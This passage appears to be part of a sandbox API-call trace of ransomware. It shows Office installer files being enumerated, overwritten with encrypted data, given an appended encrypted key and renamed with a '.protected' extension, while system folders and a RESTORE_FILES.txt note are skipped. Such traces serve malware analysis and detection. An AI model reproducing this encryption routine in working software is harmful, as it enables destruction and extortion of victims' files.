Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PidGenX.dll.protected") returned 88 [0062.812] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PidGenX.dll" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\pidgenx.dll"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PidGenX.dll.protected" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\pidgenx.dll.protected")) returned 1 [0062.813] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0062.813] lstrcmpiW (lpString1="pkeyconfig-office.xrm-ms", lpString2="Windows") returned -1 [0062.813] lstrcmpiW (lpString1="pkeyconfig-office.xrm-ms", lpString2="Program Files") returned -1 [0062.813] lstrcmpiW (lpString1="pkeyconfig-office.xrm-ms", lpString2="Program Files (x86)") returned -1 [0062.813] lstrcmpiW (lpString1="pkeyconfig-office.xrm-ms", lpString2="$Recycle.bin") returned 1 [0062.813] lstrcmpiW (lpString1="pkeyconfig-office.xrm-ms", lpString2="System 
Volume Information") returned -1 [0062.813] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms") returned 91 [0062.813] StrStrIW (lpFirst="pkeyconfig-office.xrm-ms", lpSrch=".protected") returned 0x0 [0062.813] lstrcmpW (lpString1="pkeyconfig-office.xrm-ms", lpString2="RESTORE_FILES.txt") returned -1 [0062.813] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0062.813] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x30) returned 1 [0062.813] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\pkeyconfig-office.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0062.833] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms") returned 91 [0062.833] StrStrW (lpFirst="pkeyconfig-office.xrm-ms", lpSrch=".txt") returned 0x0 [0062.833] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms") returned 91 [0062.833] StrStrW (lpFirst="pkeyconfig-office.xrm-ms", lpSrch=".rar") returned 0x0 [0062.833] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms") returned 91 [0062.833] StrStrW (lpFirst="pkeyconfig-office.xrm-ms", lpSrch=".zip") returned 0x0 [0062.834] ReadFile (in: hFile=0xb4, lpBuffer=0x499c48, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x499c48*, 
lpNumberOfBytesRead=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0062.839] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0062.839] WriteFile (in: hFile=0xb4, lpBuffer=0x499c48*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x499c48*, lpNumberOfBytesWritten=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0062.840] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0062.840] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0062.844] WriteFile (in: hFile=0xb4, lpBuffer=0x47b7a8*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x47b7a8*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0062.844] CloseHandle (hObject=0xb4) returned 1 [0062.844] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms.protected") returned 101 [0062.844] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\pkeyconfig-office.xrm-ms"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms.protected" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\pkeyconfig-office.xrm-ms.protected")) returned 1 [0062.845] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0062.845] lstrcmpiW 
(lpString1="PrjProrWW.msi", lpString2="Windows") returned -1 [0062.845] lstrcmpiW (lpString1="PrjProrWW.msi", lpString2="Program Files") returned -1 [0062.845] lstrcmpiW (lpString1="PrjProrWW.msi", lpString2="Program Files (x86)") returned -1 [0062.845] lstrcmpiW (lpString1="PrjProrWW.msi", lpString2="$Recycle.bin") returned 1 [0062.845] lstrcmpiW (lpString1="PrjProrWW.msi", lpString2="System Volume Information") returned -1 [0062.845] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.msi") returned 80 [0062.845] StrStrIW (lpFirst="PrjProrWW.msi", lpSrch=".protected") returned 0x0 [0062.845] lstrcmpW (lpString1="PrjProrWW.msi", lpString2="RESTORE_FILES.txt") returned -1 [0062.845] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0062.845] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x30) returned 1 [0062.845] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.msi" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\prjprorww.msi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0062.846] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.msi") returned 80 [0062.846] StrStrW (lpFirst="PrjProrWW.msi", lpSrch=".txt") returned 0x0 [0062.846] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.msi") returned 80 [0062.846] StrStrW (lpFirst="PrjProrWW.msi", lpSrch=".rar") returned 0x0 [0062.846] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All 
Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.msi") returned 80 [0062.846] StrStrW (lpFirst="PrjProrWW.msi", lpSrch=".zip") returned 0x0 [0062.846] ReadFile (in: hFile=0xb4, lpBuffer=0x499c48, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x499c48*, lpNumberOfBytesRead=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0062.849] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0062.849] WriteFile (in: hFile=0xb4, lpBuffer=0x499c48*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x499c48*, lpNumberOfBytesWritten=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0062.850] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0062.850] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0063.109] WriteFile (in: hFile=0xb4, lpBuffer=0x47b7a8*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x47b7a8*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0063.110] CloseHandle (hObject=0xb4) returned 1 [0063.110] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.msi.protected") returned 90 [0063.110] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.msi" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\prjprorww.msi"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.msi.protected" 
(normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\prjprorww.msi.protected")) returned 1 [0063.111] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0063.111] lstrcmpiW (lpString1="PrjProrWW.xml", lpString2="Windows") returned -1 [0063.111] lstrcmpiW (lpString1="PrjProrWW.xml", lpString2="Program Files") returned -1 [0063.111] lstrcmpiW (lpString1="PrjProrWW.xml", lpString2="Program Files (x86)") returned -1 [0063.111] lstrcmpiW (lpString1="PrjProrWW.xml", lpString2="$Recycle.bin") returned 1 [0063.111] lstrcmpiW (lpString1="PrjProrWW.xml", lpString2="System Volume Information") returned -1 [0063.111] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.xml") returned 80 [0063.111] StrStrIW (lpFirst="PrjProrWW.xml", lpSrch=".protected") returned 0x0 [0063.111] lstrcmpW (lpString1="PrjProrWW.xml", lpString2="RESTORE_FILES.txt") returned -1 [0063.111] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0063.111] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x30) returned 1 [0063.111] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.xml" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\prjprorww.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0063.113] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.xml") returned 80 [0063.113] StrStrW (lpFirst="PrjProrWW.xml", lpSrch=".txt") returned 0x0 [0063.113] lstrlenW 
(lpString="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.xml") returned 80 [0063.113] StrStrW (lpFirst="PrjProrWW.xml", lpSrch=".rar") returned 0x0 [0063.113] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.xml") returned 80 [0063.113] StrStrW (lpFirst="PrjProrWW.xml", lpSrch=".zip") returned 0x0 [0063.113] ReadFile (in: hFile=0xb4, lpBuffer=0x49bc48, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x49bc48*, lpNumberOfBytesRead=0x295f174*=0x1915, lpOverlapped=0x0) returned 1 [0063.114] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffe6eb, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0063.114] WriteFile (in: hFile=0xb4, lpBuffer=0x49bc48*, nNumberOfBytesToWrite=0x1915, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x49bc48*, lpNumberOfBytesWritten=0x295f174*=0x1915, lpOverlapped=0x0) returned 1 [0063.115] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0063.115] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0063.115] WriteFile (in: hFile=0xb4, lpBuffer=0x47b7a8*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x47b7a8*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0063.115] CloseHandle (hObject=0xb4) returned 1 [0063.115] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.xml.protected") returned 90 [0063.115] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All 
Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.xml" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\prjprorww.xml"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.xml.protected" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\prjprorww.xml.protected")) returned 1 [0063.116] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0063.116] lstrcmpiW (lpString1="PrjPrrWW.cab", lpString2="Windows") returned -1 [0063.116] lstrcmpiW (lpString1="PrjPrrWW.cab", lpString2="Program Files") returned -1 [0063.116] lstrcmpiW (lpString1="PrjPrrWW.cab", lpString2="Program Files (x86)") returned -1 [0063.116] lstrcmpiW (lpString1="PrjPrrWW.cab", lpString2="$Recycle.bin") returned 1 [0063.116] lstrcmpiW (lpString1="PrjPrrWW.cab", lpString2="System Volume Information") returned -1 [0063.116] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjPrrWW.cab") returned 79 [0063.116] StrStrIW (lpFirst="PrjPrrWW.cab", lpSrch=".protected") returned 0x0 [0063.116] lstrcmpW (lpString1="PrjPrrWW.cab", lpString2="RESTORE_FILES.txt") returned -1 [0063.116] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0063.116] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x30) returned 1 [0063.116] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjPrrWW.cab" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\prjprrww.cab"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, 
hTemplateFile=0x0) returned 0xb4 [0063.116] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjPrrWW.cab") returned 79 [0063.116] StrStrW (lpFirst="PrjPrrWW.cab", lpSrch=".txt") returned 0x0 [0063.116] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjPrrWW.cab") returned 79 [0063.116] StrStrW (lpFirst="PrjPrrWW.cab", lpSrch=".rar") returned 0x0 [0063.116] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjPrrWW.cab") returned 79 [0063.116] StrStrW (lpFirst="PrjPrrWW.cab", lpSrch=".zip") returned 0x0 [0063.116] ReadFile (in: hFile=0xb4, lpBuffer=0x49bc48, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x49bc48*, lpNumberOfBytesRead=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0063.143] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0063.143] WriteFile (in: hFile=0xb4, lpBuffer=0x49bc48*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x49bc48*, lpNumberOfBytesWritten=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0063.144] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0063.145] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0063.160] WriteFile (in: hFile=0xb4, lpBuffer=0x47b7a8*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x47b7a8*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0063.160] CloseHandle (hObject=0xb4) returned 1 [0063.161] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, 
pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjPrrWW.cab.protected") returned 89 [0063.161] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjPrrWW.cab" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\prjprrww.cab"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjPrrWW.cab.protected" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\prjprrww.cab.protected")) returned 1 [0063.162] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0063.162] lstrcmpiW (lpString1="setup.exe", lpString2="Windows") returned -1 [0063.162] lstrcmpiW (lpString1="setup.exe", lpString2="Program Files") returned 1 [0063.162] lstrcmpiW (lpString1="setup.exe", lpString2="Program Files (x86)") returned 1 [0063.162] lstrcmpiW (lpString1="setup.exe", lpString2="$Recycle.bin") returned 1 [0063.162] lstrcmpiW (lpString1="setup.exe", lpString2="System Volume Information") returned -1 [0063.162] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\setup.exe") returned 76 [0063.162] StrStrIW (lpFirst="setup.exe", lpSrch=".protected") returned 0x0 [0063.162] lstrcmpW (lpString1="setup.exe", lpString2="RESTORE_FILES.txt") returned 1 [0063.162] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0063.162] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x30) returned 1 [0063.162] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\setup.exe" (normalized: "c:\\msocache\\all 
users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\setup.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0063.162] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\setup.exe") returned 76 [0063.162] StrStrW (lpFirst="setup.exe", lpSrch=".txt") returned 0x0 [0063.162] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\setup.exe") returned 76 [0063.162] StrStrW (lpFirst="setup.exe", lpSrch=".rar") returned 0x0 [0063.162] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\setup.exe") returned 76 [0063.162] StrStrW (lpFirst="setup.exe", lpSrch=".zip") returned 0x0 [0063.162] ReadFile (in: hFile=0xb4, lpBuffer=0x49bc48, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x49bc48*, lpNumberOfBytesRead=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0063.177] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0063.177] WriteFile (in: hFile=0xb4, lpBuffer=0x49bc48*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x49bc48*, lpNumberOfBytesWritten=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0063.178] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0063.178] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0063.187] WriteFile (in: hFile=0xb4, lpBuffer=0x47b7a8*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x47b7a8*, 
lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0063.187] CloseHandle (hObject=0xb4) returned 1 [0063.187] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\setup.exe.protected") returned 86 [0063.187] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\setup.exe" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\setup.exe"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\setup.exe.protected" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\setup.exe.protected")) returned 1 [0063.188] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0063.188] lstrcmpiW (lpString1="Setup.xml", lpString2="Windows") returned -1 [0063.188] lstrcmpiW (lpString1="Setup.xml", lpString2="Program Files") returned 1 [0063.188] lstrcmpiW (lpString1="Setup.xml", lpString2="Program Files (x86)") returned 1 [0063.188] lstrcmpiW (lpString1="Setup.xml", lpString2="$Recycle.bin") returned 1 [0063.188] lstrcmpiW (lpString1="Setup.xml", lpString2="System Volume Information") returned -1 [0063.188] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Setup.xml") returned 76 [0063.188] StrStrIW (lpFirst="Setup.xml", lpSrch=".protected") returned 0x0 [0063.188] lstrcmpW (lpString1="Setup.xml", lpString2="RESTORE_FILES.txt") returned 1 [0063.188] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0063.188] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x30) returned 1 [0063.188] 
CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0063.189] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Setup.xml") returned 76 [0063.189] StrStrW (lpFirst="Setup.xml", lpSrch=".txt") returned 0x0 [0063.189] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Setup.xml") returned 76 [0063.189] StrStrW (lpFirst="Setup.xml", lpSrch=".rar") returned 0x0 [0063.189] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Setup.xml") returned 76 [0063.189] StrStrW (lpFirst="Setup.xml", lpSrch=".zip") returned 0x0 [0063.189] ReadFile (in: hFile=0xb4, lpBuffer=0x49bc48, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x49bc48*, lpNumberOfBytesRead=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0063.199] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0063.199] WriteFile (in: hFile=0xb4, lpBuffer=0x49bc48*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x49bc48*, lpNumberOfBytesWritten=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0063.199] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0063.199] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, 